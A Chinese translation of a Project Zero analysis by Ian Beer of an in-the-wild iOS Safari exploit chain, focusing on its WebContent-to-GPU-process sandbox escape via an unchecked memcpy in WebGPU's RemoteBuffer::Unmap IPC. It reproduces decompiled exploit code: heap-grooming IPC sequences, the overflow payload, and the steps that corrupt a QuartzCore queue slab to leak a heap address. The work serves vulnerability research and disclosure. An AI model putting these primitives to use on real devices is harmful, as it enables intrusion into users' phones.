对野外iOS Safari WebContent到GPU进程漏洞利用的分析
作者:Ian Beer

沙箱逃逸NSExpression载荷的图形表示
今年四月,谷歌威胁分析小组与国际特赦组织合作,发现了一个在野的iPhone 0day漏洞利用链,通过恶意链接在定向攻击中使用。该漏洞链在7天披露期限内报告给苹果,苹果于2023年4月7日发布了iOS 16.4.1,修复了CVE-2023-28206和CVE-2023-28205。
过去几年,苹果一直在强化iOS上Safari WebContent(或称“渲染器”)进程沙箱的攻击面,最近移除了WebContent进程直接访问GPU相关硬件的能力。现在,对图形相关驱动程序的访问通过一个运行在独立沙箱中的GPU进程进行代理。
对这个在野漏洞链的分析揭示了攻击者首次利用Safari IPC层从WebContent“跳转”到GPU进程的已知案例,为漏洞利用链增加了一个额外的环节(CVE-2023-32409)。
表面上看,这是一个积极的信号:明确的证据表明渲染器沙箱已经得到充分加固,以至于(至少在这个孤立案例中)攻击者需要捆绑一个额外的、独立的漏洞利用。Project Zero长期以来一直倡导减少攻击面作为提高安全性的有效工具,这似乎是该方法的一个明显胜利。
另一方面,经过更深入的检查,情况并不那么乐观。对从未考虑过隔离设计的代码进行追溯性沙箱化,很少能简单有效地完成。在这个案例中,漏洞利用针对的是一个已禁用功能的未使用IPC支持代码中一个非常基础的缓冲区溢出漏洞——这实际上是仅因为引入了沙箱而存在的新攻击面。一个针对IPC层的简单fuzzer很可能在几秒钟内就能发现这个漏洞。
尽管如此,攻击者每次仍然需要利用这个额外的环节才能到达GPU驱动内核攻击面。本文的大部分内容致力于分析攻击者开发的基于NSExpression的框架,该框架旨在简化此过程并大幅降低其边际成本。
搭建舞台
在利用JavaScriptCore垃圾回收漏洞获得原生代码执行能力后,攻击者对一个包含Mach-O二进制文件的大型JavaScript ArrayBuffer执行查找和替换操作,使用硬编码值链接多个平台和版本相关的符号地址和结构偏移:
// 为当前目标和ASLR偏移查找并重定位符号:
dt: {
ce: false,
_e: 0x1ddc50ed1,
de: 0x1dd2d05b8,
ue: 0x19afa9760,
he: 1392,
me: 48,
fe: 136,
pe: 0x1dd448e70,
ge: 305,
Ce: 0x1dd2da340,
Pe: 0x1dd2da348,
ye: 0x1dd2d45f0,
be: 0x1da613438,
...
_e: 0x1ddc50ed1,
de: 0x1dd2d05b8,
ue: 0x19afa9760,
he: 1392,
me: 48,
fe: 136,
pe: 0x1dd448e70,
ge: 305,
Ce: 0x1dd2da340,
Pe: 0x1dd2da348,
ye: 0x1dd2d45f0,
be: 0x1da613438,
// mach-o Uint32Array:
xxxx = new Uint32Array([0x77a9d075,0x88442ab6,0x9442ab8,0x89442ab8,0x89442aab,0x89442fa2,
// 对xxx进行去混淆
...
// 查找并替换符号:
xxxx.on(new m("0x2222222222222222"), p.Le);
xxxx.on(new m("0x3333333333333333"), Gs);
xxxx.on(new m("0x9999999999999999"), Bs);
xxxx.on(new m("0x8888888888888888"), Rs);
xxxx.on(new m("0xaaaaaaaaaaaaaaaa"), Is);
xxxx.on(new m("0xc1c1c1c1c1c1c1c1"), vt);
xxxx.on(new m("0xdddddddddddddddd"), p.Xt);
xxxx.on(new m("0xd1d1d1d1d1d1d1d1"), p.Jt);
xxxx.on(new m("0xd2d2d2d2d2d2d2d2"), p.Ht);
初始加载的Mach-O有一个相当小的__TEXT(代码)段,实际上它本身就是一个Mach-O加载器,从名为__embd的段加载另一个二进制文件。本分析将覆盖这个内部的Mach-O。
第一部分 - 神秘消息
浏览二进制文件中的字符串,有一组熟悉的IOKit用户客户端匹配字符串,引用了图形驱动程序:
"AppleM2ScalerCSCDriver",0
"IOSurfaceRoot",0
"AGXAccelerator",0
但跟踪对"AGXAccelerator"(它为GPU打开用户客户端)的交叉引用,这个字符串从未传递给IOServiceOpen。相反,所有对它的引用最终都到达这里(二进制文件被剥离,所以所有函数名都是我自己的):
kern_return_t
get_a_user_client(char *matching_string,
u32 type,
void* s_out) {
kern_return_t ret;
struct uc_reply_msg;
mach_port_name_t reply_port;
struct msg_1 msg;
reply_port = 0;
mach_port_allocate(mach_task_self_,
MACH_PORT_RIGHT_RECEIVE,
&reply_port);
memset(&msg, 0, sizeof(msg));
msg.hdr.msgh_bits = 0x1413;
msg.hdr.msgh_remote_port = a_global_port;
msg.hdr.msgh_local_port = reply_port;
msg.hdr.msgh_id = 5;
msg.hdr.msgh_size = 200;
msg.field_a = 0;
msg.type = type;
__strcpy_chk(msg.matching_str, matching_string, 128LL);
ret = mach_msg_send(&msg.hdr);
...
// 通过s_out从回复消息中读取一个端口并返回
虽然用户客户端匹配字符串最终出现在mach消息中并不罕见(许多漏洞利用会包含或生成自己的MIG序列化代码来与IOKit交互),但这并不是一个MIG消息。
试图追踪此消息发送到的端口权限的起源并非易事;显然还有更多事情发生。我的猜测是,这一定是在与其他东西通信,很可能是漏洞利用的其他部分。问题是:其他部分是什么?
深入兔子洞
此时,我开始遍历所有导入符号的交叉引用,这些符号可以发送或接收mach消息,希望能找到这个IPC的另一端。但这只是引发了更多问题。
特别是,有很多交叉引用指向一个发送可变大小mach消息的函数,其msgh_id为0xDBA1DBA。
谷歌上对这个常量恰好有一个匹配结果:

忽略谷歌关于我可能想搜索“蛋糕食谱”而不是这个十六进制常量的有用建议,跟随这个单一结果会导向opensource.apple.com上ConnectionCocoa.mm中的这段代码片段:
namespace IPC {
static const size_t inlineMessageMaxSize = 4096;
// 不与Mach通知消息冲突的任意消息ID(使用了我的首字母)。
constexpr mach_msg_id_t inlineBodyMessageID = 0xdba0dba;
constexpr mach_msg_id_t outOfLineBodyMessageID = 0xdba1dba;
这是Safari IPC消息中使用的一个常量!
虽然Safari长期以来一直有一个独立的网络进程,但最近才开始将GPU和图形相关功能隔离到GPU进程中。了解到这一点,这里的情况就相当清楚了:由于渲染器进程可能不再能打开AGXAccelerator用户客户端,漏洞利用必须以某种方式让GPU进程来打开。这很可能是首个在野iOS漏洞利用针对Safari IPC层的案例。
少有人走的路
谷歌搜索Safari IPC的信息并没有太多结果(除了一些非常早期的Project Zero漏洞报告),浏览WebKit源代码发现大量使用了生成代码和C++运算符重载,这两者都不利于快速了解IPC消息的二进制级结构。
但高层结构很容易弄清楚。从上面的代码片段可以看出,包含msgh_id值0xdba1dba的IPC消息将其序列化的消息体作为out-of-line描述符发送。该序列化体始终以IPC命名空间中定义的公共头部开始:
void Encoder::encodeHeader()
{
*this << defaultMessageFlags;
*this << m_messageName;
*this << m_destinationID;
}
flags和name字段都是16位值,destinationID是64位。序列化使用自然对齐,因此在name和destinationID之间有4字节的填充:

很容易枚举漏洞利用中序列化这些Safari IPC消息的所有函数。它们都没有硬编码messageName值;相反,有一层间接性表明messageName值在不同构建之间不稳定。漏洞利用使用设备的uname字符串、产品和操作系统版本来选择正确的硬编码messageName值表。
iOS共享缓存中的IPC::description函数将messageName值映射到IPC名称:
const char * IPC::description(unsigned int messageName)
{
if ( messageName > 0xC78 )
return "
else
return off_1D61ED988[messageName];
}
边界检查的大小让你对IPC攻击面的大小有个概念——在所有通信进程对之间有超过3000个IPC消息。
使用共享缓存中的表将消息名称映射到人类可读的字符串,我们可以看到漏洞利用使用了以下24个IPC消息:
0x39: GPUConnectionToWebProcess_CreateRemoteGPU
0x3a: GPUConnectionToWebProcess_CreateRenderingBackend
0x9B5: InitializeConnection
0x9B7: ProcessOutOfStreamMessage
0xBA2: RemoteAdapter_RequestDevice
0xBA5: RemoteBuffer_MapAsync
0x271: RemoteBuffer_Unmap
0xBA6: RemoteCDMFactoryProxy_CreateCDM
0x2A2: RemoteDevice_CreateBuffer
0x2C7: RemoteDisplayListRecorder_DrawNativeImage
0x2D4: RemoteDisplayListRecorder_FillRect
0x2DF: RemoteDisplayListRecorder_SetCTM
0x2F3: RemoteGPUProxy_WasCreated
0xBAD: RemoteGPU_RequestAdapter
0x402: RemoteMediaRecorderManager_CreateRecorder
0xA85: RemoteMediaRecorderManager_CreateRecorderReply
0x412: RemoteMediaResourceManager_RedirectReceived
0x469: RemoteRenderingBackendProxy_DidInitialize
0x46D: RemoteRenderingBackend_CacheNativeImage
0x46E: RemoteRenderingBackend_CreateImageBuffer
0x474: RemoteRenderingBackend_ReleaseResource
0x9B8: SetStreamDestinationID
0x9B9: SyncMessageReply
0x9BA: Terminate
这个IPC名称列表巩固了该漏洞利用针对GPU进程漏洞的理论。
寻找路径
这些消息发送到的目标端口来自一个全局变量,当加载到IDA中时,它在原始Mach-O中看起来像这样:
__data:000000003E4841C0 dst_port DCQ 0x4444444444444444
我之前提到,加载漏洞利用二进制文件的外部JS首先使用这样的模式执行查找和替换。这是计算这个特定值的代码片段:
let Ls = o(p.Ee);
let Ds = o(Ls.add(p.qe));
let Ws = o(Ds.add(p.$e));
let vs = o(Ws.add(p.Ze));
jBHk.on(new m("0x4444444444444444"), vs);
替换所有常量后,我们可以看到它遵循共享缓存内硬编码偏移的指针链:
let Ls = o(0x1dd453458);
let Ds = o(Ls.add(256));
let Ws = o(Ds.add(24);
let vs = o(Ws.add(280));
在初始符号地址(0x1dd453458)处,我们找到了WebContent进程的单例process对象,它维护其状态:
WebKit:__common:00000001DD453458 WebKit::WebProcess::singleton(void)::process
遵循偏移量,我们可以看到它们遵循这个指针链,以便找到代表WebProcess与GPU进程连接的mach端口权限:
process->m_gpuProcessConnection->m_connection->m_sendPort
漏洞利用还读取了m_receivePort字段,允许它与GPU进程建立双向通信并完全模拟WebContent进程。
定义特性
Webkit使用简单的自定义DSL定义其IPC消息,文件后缀为.messages.in。这些定义看起来像这样:
messages -> RemoteRenderPipeline NotRefCounted Stream {
void GetBindGroupLayout(uint32_t index, WebKit::WebGPUIdentifier identifier);
void SetLabel(String label)
}
这些由这个python脚本解析,以生成处理消息序列化和反序列化所需的样板代码。希望跨越序列化边界的类型定义了::encode和::decode方法:
void encode(IPC::Encoder&) const;
static WARN_UNUSED_RETURN bool decode(IPC::Decoder&, T&);
有许多宏为内置类型定义了这些编码器。
模式出现
重命名漏洞利用中发送IPC消息的方法并进一步逆向分析它们的一些参数后,一个清晰的模式出现了:
image_buffer_base_id = rand();
for (i = 0; i < 34; i++) {
IPC_RemoteRenderingBackend_CreateImageBuffer(
image_buffer_base_id + i);
}
semaphore_signal(semaphore_b);
remote_device_buffer_id_base = rand();
IPC_RemoteRenderingBackend_ReleaseResource(
image_buffer_base_id + 2);
usleep(4000u);
IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base);
usleep(4000u);
IPC_RemoteRenderingBackend_ReleaseResource(
image_buffer_base_id + 4);
usleep(4000u);
IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 1);
usleep(4000u);
IPC_RemoteRenderingBackend_ReleaseResource(
image_buffer_base_id + 6);
usleep(4000u);
IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 2);
usleep(4000u);
IPC_RemoteRenderingBackend_ReleaseResource(
image_buffer_base_id + 8);
usleep(4000u);
IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 3);
usleep(4000u);
IPC_RemoteRenderingBackend_ReleaseResource(
image_buffer_base_id + 10);
usleep(4000u);
IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 4);
usleep(4000u);
IPC_RemoteRenderingBackend_ReleaseResource(
image_buffer_base_id + 12);
usleep(4000u);
IPC_RemoteDevice_CreateBuffer_16k(remote_device_buffer_id_base + 5);
usleep(4000u);
semaphore_signal(semaphore_b);
这创建了34个RemoteRenderingBackend ImageBuffer对象,然后释放了其中6个,并可能通过RemoteDevice::CreateBuffer IPC(传递大小为16k)重新分配这些空洞。

这看起来很像堆操作,目的是将某些对象彼此相邻放置,为缓冲区溢出做准备。稍微奇怪的部分是它看起来多么简单——这里没有复杂堆整形的证据。上图只是我对可能发生情况的猜测,阅读实现IPC的代码后,这些缓冲区实际分配在哪里一点也不明显。
奇怪的参数
我开始逆向分析看起来最相关的IPC消息的结构,寻找任何看起来不对劲的地方。有一对消息看起来特别可疑:
RemoteBuffer::MapAsync
RemoteBuffer::Unmap
这是从Web进程发送到GPU进程的两个消息,定义在GPUProcess/graphics/WebGPU/RemoteBuffer.messages.in中,并在WebGPU实现中使用。
虽然实现WebGPU的IPC机制存在于Safari中,但面向用户的javascript API并不存在。它曾经在苹果提供的Safari Technology Preview版本中可用,但已经有一段时间没有启用了。W3C WebGPU小组的github wiki建议,在Safari中启用WebGPU支持时,用户应该“在浏览不受信任的网页时避免保持启用状态。”
RemoteBuffer的IPC定义如下:
messages -> RemoteBuffer NotRefCounted Stream
{
void MapAsync(PAL::WebGPU::MapModeFlags mapModeFlags,
PAL::WebGPU::Size64 offset,
std::optionalPAL::WebGPU::Size64 size)
->
(std::optional<Vector
void Unmap(Vector
}
这些WebGPU资源解释了这些API背后的概念。它们旨在管理GPU和CPU之间的缓冲区共享:
MapAsync将缓冲区的所有权从GPU移动到CPU,允许CPU在不与GPU竞争的情况下操作它。
Unmap然后发出CPU已完成缓冲区的信号,所有权可以返回给GPU。
实际上,MapAsync IPC将WebGPU缓冲区的当前内容(在指定偏移处)作为Vector
你可能已经看出这会导致什么了……
缓冲区生命周期
RemoteBuffers在WebContent端使用RemoteDevice::CreateBuffer IPC创建:
messages -> RemoteDevice NotRefCounted Stream {
void Destroy()
void CreateBuffer(WebKit::WebGPU::BufferDescriptor descriptor,
WebKit::WebGPUIdentifier identifier)
这接受要创建的缓冲区的描述和一个标识符来命名它。漏洞利用中对此IPC的所有调用都使用了固定大小0x4000,即16KB,这是iOS上单个物理页面的大小。
这些IPC重要的第一个迹象是在某些地方传递给MapAsync的相当奇怪的参数:
IPC_RemoteBuffer_MapAsync(remote_device_buffer_id_base + m,
0x4000,
0);
如上所示,此IPC接受缓冲区id、要映射的偏移量和大小——按此顺序。因此,此IPC调用请求映射id为remote_device_buffer_id_base + m的缓冲区,偏移量为0x4000(最末尾),大小为0(即无内容)。
紧接着,他们调用IPC_RemoteBuffer_Unmap,传递一个40字节的向量作为“新内容”:
b[0] = 0x7F6F3229LL;
b[1] = 0LL;
b[2] = 0LL;
b[3] = 0xFFFFLL;
b[4] = arg_val;
return IPC_RemoteBuffer_Unmap(dst, b, 40LL);
缓冲区起源
我花了相当多的时间试图找出支持RemoteBuffer缓冲区分配的基础页面的起源。从Webkit静态跟踪代码,你最终会进入AGX GPU系列驱动程序的用户空间端,这些驱动程序是用Objective-C编写的。有很多方法名如:
id __cdecl -[AGXG15FamilyDevice newBufferWithLength:options:]
暗示负责缓冲区分配——但看不到malloc、mmap或vm_allocate。
在使用M1 Macbook上的GPU进行实验时,使用dtrace转储用户空间和内核堆栈跟踪,我最终发现这个缓冲区是由GPU驱动程序本身分配的,然后将该内存映射到用户空间:
IOMemoryDescriptor::createMappingInTask
IOBufferMemoryDescriptor::initWithPhysicalMask
com.apple.AGXG13XAGXAccelerator::
createBufferMemoryDescriptorInTaskWithOptions
com.apple.iokit.IOGPUFamilyIOGPUSysMemory::withOptions
com.apple.iokit.IOGPUFamilyIOGPUResource::newResourceWithOptions
com.apple.iokit.IOGPUFamilyIOGPUDevice::new_resource
com.apple.iokit.IOGPUFamilyIOGPUDeviceUserClient::s_new_resource
kernel.release.t60000xfffffe00263116cc+0x80
kernel.release.t60000xfffffe00263117bc+0x28c
kernel.release.t60000xfffffe0025d326d0+0x184
kernel.release.t60000xfffffe0025c3856c+0x384
kernel.release.t60000xfffffe0025c0e274+0x2c0
kernel.release.t60000xfffffe0025c25a64+0x1a4
kernel.release.t60000xfffffe0025c25e80+0x200
kernel.release.t60000xfffffe0025d584a0+0x184
kernel.release.t60000xfffffe0025d62e08+0x5b8
kernel.release.t60000xfffffe0025be37d0+0x28
^
--- kernel stack | | userspace stack ---
v
libsystem_kernel.dylibmach_msg2_trap
IOKitio_connect_method
IOKitIOConnectCallMethod
IOGPUIOGPUResourceCreate
IOGPU-[IOGPUMetalResource initWithDevice:
remoteStorageResource:
options:
args:
argsSize:]
IOGPU-[IOGPUMetalBuffer initWithDevice:
pointer:
length:
alignment:
options:
sysMemSize:
gpuAddress:
args:
argsSize:
deallocator:]
AGXMetalG13X-[AGXBuffer(Internal) initWithDevice:
length:
alignment:
options:
isSuballocDisabled:
resourceInArgs:
pinnedGPULocation:]
AGXMetalG13X-[AGXBuffer initWithDevice:
length:
alignment:
options:
isSuballocDisabled:
pinnedGPULocation:]
AGXMetalG13X-[AGXG13XFamilyDevice newBufferWithDescriptor:]
IOGPUIOGPUMetalSuballocatorAllocate
The algorithm which IOMemoryDescriptor::createMappingInTask will use to find space in the task virtual memory is identical to that used by vm_allocate, which starts to explain why the "heap groom" seen earlier is so simple, as vm_allocate uses a simple bottom-up first fit algorithm.
mapAsync
With the origin of the buffer figured out we can trace the GPU process side of the mapAsync IPC. Through various layers of indirection we eventually reach the following code with controlled offset and size values:
void* Buffer::getMappedRange(size_t offset, size_t size)
{
// https://gpuweb.github.io/gpuweb/#dom-gpubuffer-getmappedrange
auto rangeSize = size;
if (size == WGPU_WHOLE_MAP_SIZE)
rangeSize = computeRangeSize(m_size, offset);
if (!validateGetMappedRange(offset, rangeSize)) {
// FIXME: "throw an OperationError and stop."
return nullptr;
}
m_mappedRanges.add({ offset, offset + rangeSize });
m_mappedRanges.compact();
return static_cast<char*>(m_buffer.contents) + offset;
}
m_buffer.contents is the base of the buffer which the GPU kernel driver mapped into the GPU process address space via AGXAccelerator::createBufferMemoryDescriptorInTaskWithOptions. This code stores the requested mapping range in m_mappedRanges then returns a raw pointer into the underlying page. Higher up the callstack that raw pointer and length is stored into the m_mappedRange field. The higher level code then makes a copy of the contents of the buffer at that offset, wrapping that copy in a Vector<> to send back over IPC.
unmap
Here's the implementation of the RemoteBuffer_Unmap IPC on the GPU process side. At this point data is a Vector<> sent by the WebContent client.
void RemoteBuffer::unmap(Vector
{
if (!m_mappedRange)
return;
ASSERT(m_isMapped);
if (m_mapModeFlags.contains(PAL::WebGPU::MapMode::Write))
memcpy(m_mappedRange->source, data.data(), data.size());
m_isMapped = false;
m_mappedRange = std::nullopt;
m_mapModeFlags = { };
}
The issue is a sadly trivial one: whilst the RemoteBuffer code does check that the client has previously mapped this buffer object - and thus m_mappedRange contains the offset and size of that mapped range - it fails to verify that the size of the Vector<> of "modified contents" actually matches the size of the previous mapped range. Instead the code simply blindly memcpy's the client-supplied Vector<> into the mapped range using the Vector<>'s size rather than the range's.
This unchecked memcpy using values directly from an IPC is the in-the-wild sandbox escape vulnerability.
void RemoteBuffer::unmap(Vector
{
- if (!m_mappedRange)
- if (!m_mappedRange || m_mappedRange->byteLength < data.size())
return;
ASSERT(m_isMapped);
It should be noted that security issues with WebGPU are well-known and the javascript interface to WebGPU is disabled in Safari on iOS. But the IPC's which support that javascript interface were not disabled, meaning that WebGPU still presented a rich sandbox-escape attack surface. This seems like a significant oversight.
Destination unknown?
Finding the allocation site for the GPU buffer wasn't trivial; the allocation site for the buffer was hard to determine statically, which made it hard to get a picture of what objects were being groomed. Figuring out the overflow target and its allocation site was similarly tricky.
Statically following the implementation of the RemoteRenderingBackend::CreateImageBuffer IPC, which, based on the high-level flow of the exploit, appeared like it must be responsible for allocating the overflow target again quickly ended up in system library code with no obvious targets.
Working with the theory that because of the simplicity of the heap groom it was likely that vm_allocate/mmap was somehow responsible for the allocations I set breakpoints on those APIs on an M1 mac in the Safari GPU process and ran the WebGL conformance tests. There was only a single place where mmap was called:
Target 0: (com.apple.WebKit.GPU) stopped.
(lldb) bt
- thread #30, name = 'RemoteRenderingBackend work queue',
stop reason = breakpoint 12.1
- frame #0: mmap
frame #1: QuartzCoreCA::CG::Queue::allocate_slab
frame #2: QuartzCoreCA::CG::Queue::alloc
frame #3: QuartzCoreCA::CG::ContextDelegate::fill_rects
frame #4: QuartzCoreCA::CG::ContextDelegate::draw_rects_
frame #5: CoreGraphicsCGContextFillRects
frame #6: CoreGraphicsCGContextFillRect
frame #7: CoreGraphicsCGContextClearRect
frame #8: WebKit::ImageBufferShareableMappedIOSurfaceBackend::create
frame #9: WebKit::RemoteRenderingBackend::createImageBuffer
这与我们在上面堆整形中看到的IPC完美对应!
深入核心……
QuartzCore是iOS上低级绘图/渲染代码的一部分。逆向分析mmap站点周围的代码,它似乎是一个用于绘图命令的自定义队列类型。稍后转储mmap的QueueSlab内存,我们看到一些结构:
(lldb) x/10xg $x0
0x13574c000: 0x00000001420041d0 0x0000000000000000
0x13574c010: 0x0000000000004000 0x0000000000003f10
0x13574c020: 0x000000013574c0f0 0x0000000000000000
逆向分析一些周围的QuartzCore代码,我们可以弄清楚头部有一个类似这样的结构:
struct QuartzQueueSlab
{
struct QuartzQueueSlab *free_list_ptr;
uint64_t size_a;
uint64_t mmap_size;
uint64_t remaining_size;
uint64_t buffer_ptr;
uint64_t f;
uint8_t inline_buffer[16336];
};
这是一个简短的头部,包含一个空闲列表指针、一些大小,然后是指向内联缓冲区的指针。字段初始化如下:
mapped_base->free_list_ptr = 0;
mapped_base->size_a = 0;
mapped_base->mmap_size = mmap_size;
mapped_base->remaining_size = mmap_size - 0x30;
mapped_base->buffer_ptr = mapped_base->inline_buffer;

QueueSlab是一个简单的分配器。end开始时指向内联缓冲区的起始处;只要remaining指示仍有可用空间,每次分配后都会向上移动:

假设这很可能就是破坏目标;调用RemoteBuffer::Unmap会破坏此头部的字节,排列如下:

b[0] = 0x7F6F3229LL;
b[1] = 0LL;
b[2] = 0LL;
b[3] = 0xFFFFLL;
b[4] = arg;
return IPC_RemoteBuffer_Unmap(dst, b, 40LL);
漏洞利用围绕RemoteBuffer::Unmap IPC的包装器接受单个参数,该参数将与QueueSlab的内联缓冲区指针完美对齐,将其替换为任意值。
队列slab由更高级别的CA::CG::Queue对象指向,而该对象又由CGContext对象指向。
整形2
在触发Unmap溢出之前,还有另一个整形:
remote_device_after_base_id = rand();
for (j = 0; j < 200; j++) {
IPC_RemoteDevice_CreateBuffer_16k(
remote_device_after_base_id + j);
}
semaphore_signal(semaphore_b);
semaphore_signal(semaphore_a);
IPC_RemoteRenderingBackend_CacheNativeImage(
image_buffer_base_id + 34LL);
semaphore_signal(semaphore_b);
semaphore_signal(semaphore_a);
for (k = 0; k < 200; k++) {
IPC_RemoteDevice_CreateBuffer_16k(
remote_device_after_base_id + 200 + k);
}
这显然试图将与RemoteRenderingBackend::CacheNativeImage相关的分配放置在与RemoteDevice::CreateBuffer相关的大量分配附近,这是我们之前看到的导致RemoteBuffer对象分配的IPC。这个整形的目的将在后面变得清晰。
溢出1
第一个溢出的核心原语涉及4个IPC方法:
- RemoteBuffer::MapAsync - 设置溢出的目标指针
- RemoteBufferUnmap - 执行溢出,破坏队列元数据
- RemoteDisplayListRecorder::DrawNativeImage - 使用被破坏的队列元数据将指针写入受控地址
- RemoteCDMFactoryProxy::CreateCDM - 披露写入的指针值
我们将依次查看每一个:
IPC 1 - MapAsync
for (m = 0; m < 6; m++) {
index_of_corruptor = m;
IPC_RemoteBuffer_MapAsync(remote_device_buffer_id_base + m,
0x4000LL,
0LL);

他们遍历所有6个RemoteBuffer对象,希望整形成功将至少一个放置在QueueSlab分配之前。这个MapAsync IPC将RemoteBuffer的m_mappedRange->source字段设置为指向最末尾(希望是QueueSlab)。
IPC 2 - Unmap
wrap_remote_buffer_unmap(remote_device_buffer_id_base + m,
WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current - 0x88)
wrap_remote_buffer_unmap是我们之前见过片段的包装函数,它调用Unmap IPC:
void* wrap_remote_buffer_unmap(int64 dst, int64 arg)
{
int64 b[5];
b[0] = 0x7F6F3229LL;
b[1] = 0LL;
b[2] = 0LL;
b[3] = 0xFFFFLL;
b[4] = arg;
return IPC_RemoteBuffer_Unmap(dst, b, 40LL);
}
传递给wrap_remote_buffer_unmap的arg值(这是下一步覆盖的基本目标地址)是(WTF::ObjectIdentifierBase::generateIdentifierInternal_void_::current - 0x88),这是一个由JS对Mach-O执行查找和替换链接的符号,它指向这里使用的全局变量:
int64 WTF::ObjectIdentifierBase::generateIdentifierInternal()
{
return ++WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current;
}
顾名思义,这用于使用单调递增计数器生成唯一id(此函数之上有一层锁定)。传递给Unmap IPC的值指向::current地址下方0x88处。

如果整形成功,这将破坏QueueSlab的内联缓冲区指针,使其指向GPU进程用于分配新标识符的计数器下方0x88字节处。
IPC 3 - DrawNativeImage
for ( n = 0; n < 0x22; ++n ) {
if (n == 2 || n == 4 || n == 6 || n == 8 || n == 10 || n == 12) {
continue
}
IPC_RemoteDisplayListRecorder_DrawNativeImage(
image_buffer_base_id + n,// 可能被破坏的目标
image_buffer_base_id + 34LL);
然后漏洞利用遍历所有ImageBuffer对象(跳过那些被释放以为RemoteBuffers制造空洞的对象),并依次将每个作为第一个参数传递给IPC_RemoteDisplayListRecorder_DrawNativeImage。希望其中一个关联的QueueSlab结构被破坏。传递给DrawNativeImage的第二个参数是之前调用CacheNativeImage的ImageBuffer。
让我们在GPU进程端跟踪DrawNativeImage的实现,看看与第一个ImageBuffer关联的被破坏QueueSlab发生了什么:
void RemoteDisplayListRecorder::drawNativeImage(
RenderingResourceIdentifier imageIdentifier,
const FloatSize& imageSize,
const FloatRect& destRect,
const FloatRect& srcRect,
const ImagePaintingOptions& options)
{
drawNativeImageWithQualifiedIdentifier(
{imageIdentifier, m_webProcessIdentifier},
imageSize,
destRect,
srcRect,
options);
}
这立即调用:
void
RemoteDisplayListRecorder::drawNativeImageWithQualifiedIdentifier(
QualifiedRenderingResourceIdentifier imageIdentifier,
const FloatSize& imageSize,
const FloatRect& destRect,
const FloatRect& srcRect,
const ImagePaintingOptions& options)
{
RefPtr image = resourceCache().cachedNativeImage(imageIdentifier);
if (!image) {
ASSERT_NOT_REACHED();
return;
}
handleItem(DisplayList::DrawNativeImage(
imageIdentifier.object(),
imageSize,
destRect,
srcRect,
options),
*image);
}
这里的imageIdentifier对应于之前传递给CacheNativeImage的ImageBuffer的ID。简要查看CacheNativeImage的实现,我们可以看到它分配了一个NativeImage对象(最终由上面的cachedNativeImage调用返回):
void
RemoteRenderingBackend::cacheNativeImage(
const ShareableBitmap::Handle& handle,
RenderingResourceIdentifier nativeImageResourceIdentifier)
{
cacheNativeImageWithQualifiedIdentifier(
handle,
{nativeImageResourceIdentifier,
m_gpuConnectionToWebProcess->webProcessIdentifier()}
);
}
void
RemoteRenderingBackend::cacheNativeImageWithQualifiedIdentifier(
const ShareableBitmap::Handle& handle,
QualifiedRenderingResourceIdentifier nativeImageResourceIdentifier)
{
auto bitmap = ShareableBitmap::create(handle);
if (!bitmap)
return;
auto image = NativeImage::create(
bitmap->createPlatformImage(
DontCopyBackingStore,
ShouldInterpolate::Yes),
nativeImageResourceIdentifier.object());
if (!image)
return;
m_remoteResourceCache.cacheNativeImage(
image.releaseNonNull(),
nativeImageResourceIdentifier);
}
这个NativeImage对象由默认的系统malloc分配。
返回到DrawNativeImage流程,我们到达这里:
void DrawNativeImage::apply(GraphicsContext& context, NativeImage& image) const
{
context.drawNativeImage(image, m_imageSize, m_destinationRect, m_srcRect, m_options);
}
context对象是一个GraphicsContextCG,是系统CoreGraphics CGContext对象的包装器:
void GraphicsContextCG::drawNativeImage(NativeImage& nativeImage, const FloatSize& imageSize, const FloatRect& destRect, const FloatRect& srcRect, const ImagePaintingOptions& options)
最终调用:
CGContextDrawImage(context, adjustedDestRect, subImage.get());
这调用CGContextDrawImageWithOptions。
通过CoreGraphics库中的更多间接层,最终到达:
int64 CA::CG::ContextDelegate::draw_image_(
int64 delegate,
int64 a2,
int64 a3,
CGImage *image...) {
...
alloc_from_slab = CA::CG::Queue::alloc(queue, 160);
if (alloc_from_slab)
CA::CG::DrawImage::DrawImage(
alloc_from_slab,
Info_2,
a2,
a3,
FillColor_2,
&v18,
AlternateImage_0);
通过delegate对象,代码检索CGContext,并从中获取具有被破坏QueueSlab的Queue。然后他们从被破坏的队列slab进行160字节的分配。
void*
CA::CG::Queue::alloc(CA::CG::Queue *q, __int64 size)
{
uint64_t buffer*;
...
size_rounded = (size + 31) & 0xFFFFFFFFFFFFFFF0LL;
current_slab = q->current_slab;
if ( !current_slab )
goto alloc_slab;
if ( !q->c || current_slab->remaining_size >= size_rounded )
goto GOT_ENOUGH_SPACE;
...
GOT_ENOUGH_SPACE:
remaining_size = current_slab->remaining_size;
new_remaining = remaining_size - size_requested_rounded;
if ( remaining_size >= size_requested_rounded )
{
buffer = current_slab->end;
current_slab->remaining_size = new_remaining;
current_slab->end = buffer + size_rounded;
goto RETURN_ALLOC;
...
RETURN_ALLOC:
buffer[0] = size_rounded;
atomic_fetch_add(q->alloc_meta);
buffer[1] = q->alloc_meta
...
return &buffer[2];
}
当CA::CG::Queue::alloc尝试从被破坏的QueueSlab分配时,它看到slab声称有0xffff字节的剩余空间,因此继续通过跟随end指针将0x10字节的头部写入缓冲区,然后返回该end指针加上0x10。这具有返回一个指向WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current全局变量下方0x78字节处的值的效果。
然后draw_image_将此分配作为第一个参数传递给CA::CG::DrawImage::DrawImage(以cachedImage指针作为最终参数)。
int64 CA::CG::DrawImage::DrawImage(
int64 slab_buf,
int64 a2,
int64 a3,
int64 a4,
int64 a5,
OWORD *a6,
CGImage *img)
{
...
(slab_buf + 0x78) = CGImageRetain(img);
DrawImage将指向cachedImage对象的指针写入假slab分配的+0x78处,现在恰好与WTF::ObjectIdentifierBase::generateIdentifierInternal(void)::current重叠。这具有将::current单调计数器的当前值替换为缓存的NativeImage对象的地址的效果。
IPC 4 - CreateCDM
此部分的最后一步是调用任何导致GPU进程使用generateIdentifierInternal分配新标识符的IPC:
interesting_identifier = IPC_RemoteCDMFactoryProxy_CreateCDM();
如果新标识符大于0x10000,它们屏蔽掉低4位,并成功披露了缓存的NativeImage对象的远程地址。
